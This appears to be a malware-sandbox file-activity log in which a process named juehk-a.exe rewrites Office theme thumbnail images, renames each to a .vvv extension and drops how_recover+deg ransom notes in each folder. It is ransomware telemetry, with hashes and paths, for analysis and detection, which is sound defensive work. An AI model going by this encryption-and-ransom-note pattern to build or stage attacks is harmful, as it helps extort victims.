- timestamp: 84990
- mode: open
- sequenceNumber: 1551
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EXPEDITN\THMBNAIL.PNG
- filesize: 60724
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499626
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85010
- mode: close
- sequenceNumber: 1552
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EXPEDITN\THMBNAIL.PNG
- filesize: 61150
- md5sum: bd0feffe875b9257b037940cb6058f10
- sha1sum: 4711b9055246b70b36c334788a552a3d1ef27727
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499626
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85026
- mode: rename
- sequenceNumber: 1553
- filesize: 61150
- md5sum: bd0feffe875b9257b037940cb6058f10
- sha1sum: 4711b9055246b70b36c334788a552a3d1ef27727
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EXPEDITN\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EXPEDITN\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499626
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85131
- mode: created
- sequenceNumber: 1554
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EXPEDITN\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521309
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85137
- mode: close
- sequenceNumber: 1555
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EXPEDITN\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521309
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85145
- mode: created
- sequenceNumber: 1556
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EXPEDITN\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521310
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85152
- mode: close
- sequenceNumber: 1557
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EXPEDITN\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521310
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85179
- mode: open
- sequenceNumber: 1558
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ICE\THMBNAIL.PNG
- filesize: 18817
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499627
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85648
- mode: close
- sequenceNumber: 1559
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ICE\THMBNAIL.PNG
- filesize: 19246
- md5sum: df0b3ea6858fcad1cba1f3b2acd827d9
- sha1sum: ff49c6ec871d5da08d9667855f70047486a1c80e
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499627
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85658
- mode: rename
- sequenceNumber: 1560
- filesize: 19246
- md5sum: df0b3ea6858fcad1cba1f3b2acd827d9
- sha1sum: ff49c6ec871d5da08d9667855f70047486a1c80e
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ICE\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ICE\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499627
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85695
- mode: created
- sequenceNumber: 1561
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ICE\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521311
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85702
- mode: close
- sequenceNumber: 1562
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ICE\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521311
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85711
- mode: created
- sequenceNumber: 1563
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ICE\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521312
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85716
- mode: close
- sequenceNumber: 1564
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ICE\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521312
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85724
- mode: open
- sequenceNumber: 1565
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\INDUST\THMBNAIL.PNG
- filesize: 33559
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499628
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85780
- mode: close
- sequenceNumber: 1566
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\INDUST\THMBNAIL.PNG
- filesize: 33982
- md5sum: e83346f5493fd82eba093df659e0d106
- sha1sum: 5a06ddcfada54831dd54b87255843d55ca423f46
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499628
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85788
- mode: rename
- sequenceNumber: 1567
- filesize: 33982
- md5sum: e83346f5493fd82eba093df659e0d106
- sha1sum: 5a06ddcfada54831dd54b87255843d55ca423f46
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\INDUST\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\INDUST\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499628
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85797
- mode: created
- sequenceNumber: 1568
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\INDUST\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521313
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85803
- mode: close
- sequenceNumber: 1569
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\INDUST\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521313
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85810
- mode: created
- sequenceNumber: 1570
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\INDUST\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521314
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85819
- mode: close
- sequenceNumber: 1571
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\INDUST\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521314
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85836
- mode: open
- sequenceNumber: 1572
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\IRIS\THMBNAIL.PNG
- filesize: 19485
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499629
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85906
- mode: close
- sequenceNumber: 1573
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\IRIS\THMBNAIL.PNG
- filesize: 19902
- md5sum: 4150a65a1c09de30ba141fb2d3f5dd3e
- sha1sum: 0324527c0e07290d41bbaa2f601cb79b64fbaec3
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499629
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85916
- mode: rename
- sequenceNumber: 1574
- filesize: 19902
- md5sum: 4150a65a1c09de30ba141fb2d3f5dd3e
- sha1sum: 0324527c0e07290d41bbaa2f601cb79b64fbaec3
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\IRIS\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\IRIS\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499629
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85950
- mode: created
- sequenceNumber: 1575
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\IRIS\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1688849860362642
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85963
- mode: close
- sequenceNumber: 1576
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\IRIS\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1688849860362642
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85969
- mode: created
- sequenceNumber: 1577
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\IRIS\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521315
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85973
- mode: close
- sequenceNumber: 1578
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\IRIS\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521315
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85982
- mode: open
- sequenceNumber: 1579
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\JOURNAL\THMBNAIL.PNG
- filesize: 18413
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499630
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86003
- mode: close
- sequenceNumber: 1580
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\JOURNAL\THMBNAIL.PNG
- filesize: 18830
- md5sum: b9c216033da886a3f6e58fd2fb884d3c
- sha1sum: 29ac88b7cc1a6eacdbf7ff377f08b89e6d981f0c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499630
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86012
- mode: rename
- sequenceNumber: 1581
- filesize: 18830
- md5sum: b9c216033da886a3f6e58fd2fb884d3c
- sha1sum: 29ac88b7cc1a6eacdbf7ff377f08b89e6d981f0c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\JOURNAL\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\JOURNAL\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499630
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86070
- mode: created
- sequenceNumber: 1582
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\JOURNAL\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521316
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86080
- mode: close
- sequenceNumber: 1583
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\JOURNAL\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521316
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86087
- mode: created
- sequenceNumber: 1584
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\JOURNAL\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521317
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86093
- mode: close
- sequenceNumber: 1585
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\JOURNAL\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521317
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86100
- mode: open
- sequenceNumber: 1586
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LAYERS\THMBNAIL.PNG
- filesize: 44850
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499631
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86140
- mode: close
- sequenceNumber: 1587
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LAYERS\THMBNAIL.PNG
- filesize: 45278
- md5sum: c85813a647ca4b384f5f017d99e05602
- sha1sum: 60e37a9b34d3e5eca261ccea142a227a514e8db5
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499631
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86149
- mode: rename
- sequenceNumber: 1588
- filesize: 45278
- md5sum: c85813a647ca4b384f5f017d99e05602
- sha1sum: 60e37a9b34d3e5eca261ccea142a227a514e8db5
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LAYERS\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LAYERS\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499631
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86198
- mode: created
- sequenceNumber: 1589
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LAYERS\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521318
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86204
- mode: close
- sequenceNumber: 1590
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LAYERS\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521318
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86216
- mode: created
- sequenceNumber: 1591
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LAYERS\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521319
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86220
- mode: close
- sequenceNumber: 1592
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LAYERS\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521319
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86225
- mode: open
- sequenceNumber: 1593
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LEVEL\THMBNAIL.PNG
- filesize: 48115
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499632
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86268
- mode: close
- sequenceNumber: 1594
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LEVEL\THMBNAIL.PNG
- filesize: 48542
- md5sum: baf501072dfde0c39241e197fd06e7ba
- sha1sum: 76d8f43b3fdbb45b7e6131c57cf89613b92ed7db
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499632
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86277
- mode: rename
- sequenceNumber: 1595
- filesize: 48542
- md5sum: baf501072dfde0c39241e197fd06e7ba
- sha1sum: 76d8f43b3fdbb45b7e6131c57cf89613b92ed7db
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LEVEL\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LEVEL\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499632
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86290
- mode: created
- sequenceNumber: 1596
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LEVEL\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521320
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86304
- mode: close
- sequenceNumber: 1597
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LEVEL\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521320
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86314
- mode: created
- sequenceNumber: 1598
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LEVEL\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 6473924464430764
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86318
- mode: close
- sequenceNumber: 1599
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LEVEL\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 6473924464430764
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86323
- mode: open
- sequenceNumber: 1600
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\NETWORK\THMBNAIL.PNG
- filesize: 11573
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499633
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86331
- mode: close
- sequenceNumber: 1601
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\NETWORK\THMBNAIL.PNG
- filesize: 11998
- md5sum: 70d73359b0071164e5eb26799e13e1c8
- sha1sum: fa5ea850e74c7493278d7fc725510796fa388463
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499633
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86337
- mode: rename
- sequenceNumber: 1602
- filesize: 11998
- md5sum: 70d73359b0071164e5eb26799e13e1c8
- sha1sum: fa5ea850e74c7493278d7fc725510796fa388463
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\NETWORK\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\NETWORK\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499633
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86347
- mode: created
- sequenceNumber: 1603
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\NETWORK\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521321
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86354
- mode: close
- sequenceNumber: 1604
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\NETWORK\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521321
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86362
- mode: created
- sequenceNumber: 1605
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\NETWORK\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521322
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86369
- mode: close
- sequenceNumber: 1606
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\NETWORK\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521322
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86377
- mode: open
- sequenceNumber: 1607
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PAPYRUS\THMBNAIL.PNG
- filesize: 37440
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499634
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86396
- mode: close
- sequenceNumber: 1608
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PAPYRUS\THMBNAIL.PNG
- filesize: 37870
- md5sum: 99ca012a9efd7146ffa08e5e4cf173e0
- sha1sum: c3b0108291f3dd2d490b77ba10d08b6047b0cce5
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499634
- ntstatus: 0x0
- CreateOptions: 0x0
